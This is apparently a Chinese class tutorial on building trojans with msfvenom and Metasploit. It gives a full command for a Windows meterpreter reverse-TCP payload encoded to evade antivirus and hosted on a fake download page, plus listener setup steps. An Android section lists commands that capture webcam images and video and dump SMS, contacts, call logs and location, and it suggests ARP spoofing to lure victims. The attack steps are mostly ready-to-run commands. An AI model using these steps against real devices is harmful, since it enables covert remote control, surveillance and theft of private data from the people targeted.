木马生成

简介: 木马生成

攻击复现

1. 生成病毒

参数解释

1. -p payload

攻击所用的 payload ,这里使用 windows/meterpreter/reverse_tcp ,获取反弹

shell 。

2. lhost local host

攻击方 IP 地址。

3. lport local port

攻击方端口,这个端口与 msfconsole 中监听的要一致。

4. -e encoders

将程序进行编码,以绕过杀毒软件的检测,这里我们使用 x86/alpha_mixed 。

5. -i iterator times

迭代的次数,因为每次编码是对上一次编码的内容再次进行编码,在计算机领域这种操作叫

做“迭代(iterator)”,因此参数是 i .

迭代的过程中程序的体积会越来越大,因此要适当控制迭代次数。

6. -f file type

msfvenom -p windows/meterpreter/reverse_tcp lhost=[本地 IP] lport=[监听端口] -e [编

码方式] -i [编码次数] -f [格式] >[木马程序文件名]

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.124 lport=8848 -e

x86/alpha_mixed -i 1 -f exe >/home/yijin/fake-page/static/evil.exe

这里我们是要生成 Windows 可执行程序,因此格式为 exe 。

7. > 写入文件

我们将在 /home/yijin/fake-page/ 下跑一个网页服务,并诱导靶机从这里下载木马,因此

放在这个目录下。

2. 启动网页

网页内容已经放在了 /home/yijin/fake-page/ 目录,在这里执行 node server.js 启动服务。

3. 开启端口监听

1. msfconsole 进入 metasploit 控制台;

2. use exploit/multi/handler 使用“多面手”模块;

3. set payload windows/meterpreter/reverse_tcp 设置 payload;

4. set LHOST [IP] 设置本地IP(攻击机 IP);

5. set LPORT [PORT] 设置本地监听端口;

6. run 开始监听。

4. 靶机下载并运行木马

如无意外,在 msfconsole 输入 shell 即可拿到 shell;

whoami 查看自己身份;

可以通过关机来展示攻击成果。

5. 可演示操作

whoami 账号名称

ver 版本信息

winver windows 版本信息

hostname 主机名

ipconfig IP 地址

call xx.bat

mshta javascript:confirm("Hello world!");window.close() 弹窗问候

strat iexplore "ke.yijincc.com"

time /t 显示当前时间

安卓木马

复现步骤

老师:由于时间的关系,我们这里还是把生成的木马程序放到那个网站下,但是由于时间关系,我们就

不去改网站源码了,直接访问它的一个下载地址就行。

1. 打开模拟器,运行一个安卓系统

2. msfvenom 生成木马

3. msfconsole 开始监听

1. msfconsole 进入 metasploit 控制台;

2. set payload windows/meterpreter/reverse_tcp 设置 payload;

3. set LHOST [IP] 设置本地IP(攻击机 IP);

4. set LPORT [PORT] 设置本地监听端口;

5. run 开始监听。

4. 靶机下载、并运行木马

靶机访问攻击机页面(这里可以结合 ARP 欺骗,也可以直接访问 IP),并下载木马,运行。

!注意,这里不用输入 shell;

whoami 查看自己身份;

安卓命令

1. check_root 检查是否已经 root;

2. sysinfo 查看系统信息;

3. webcam_list 枚举摄像头;

4. webcam_snap -i [CAM INDEX] 使用指定的摄像头拍照;

5. webcam_stream 从指定的摄像头播放视频流;

6. 图片文件搜索;

7. 下载文件;

8. dump_sms 获取短信;

9. dump_contacts 下载通讯录;

10. geolocate 查看定位,但是需要安装谷歌地图;

11. dump_calllog 下载通话记录;

相关文章
|
2月前
|
安全 NoSQL Linux
常见的挖矿木马
常见的挖矿木马
|
安全 Linux PHP
浅谈木马
浅谈木马远控 在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。
|
安全 JavaScript 前端开发
网站总是被上传漏洞上传了木马后门被入侵怎么办
SINE安全又带上业务逻辑漏洞来跟大家做分享了,这一次的主题内容是上传文件漏洞。许许多多企业网站都准许客户自己图片上传、电子版资料,假如上传功能并没有搞好安全防护对策,就存有极大的安全隐患。假如网站应用领域在上传文件流程中并没有对文档的安全性能采取合理的校检,攻击者能够根据上传webshell等恶意文档对php服务器攻击,这样的情况下指出操作系统存有上传文件漏洞。下列是我汇总的一小部分上传漏洞的情景,假如你拥有掌握其他上传避过姿势还可以和我们讨论讨论。
218 0
网站总是被上传漏洞上传了木马后门被入侵怎么办
|
开发框架 安全 Java
网站后门木马查杀该怎么删除
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
369 0
网站后门木马查杀该怎么删除
|
监控 安全 程序员
服务器里如何查杀网站后门文件
收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况,一脸懵逼,无奈询问度娘吧,百度搜索了什么是webshell,为了解决这个问题,我可是下了很大的功夫,终于了解清楚并解决了阿里云提示网站后门的这个问题,记录一下我解决问题的过程。
3873 0
|
安全 NoSQL Redis
阿里云查杀恶意木马2t3ik.p
一次杀病毒经历 阿里云控制台查看恶意木马2t3ik.p image.png image.png top 查看2t3ik.p进程cpu占用很高 杀掉进程后依然启动 这种情况一般是应用有定时任务或有守护进程 image.
1213 0
|
安全 网络安全 数据安全/隐私保护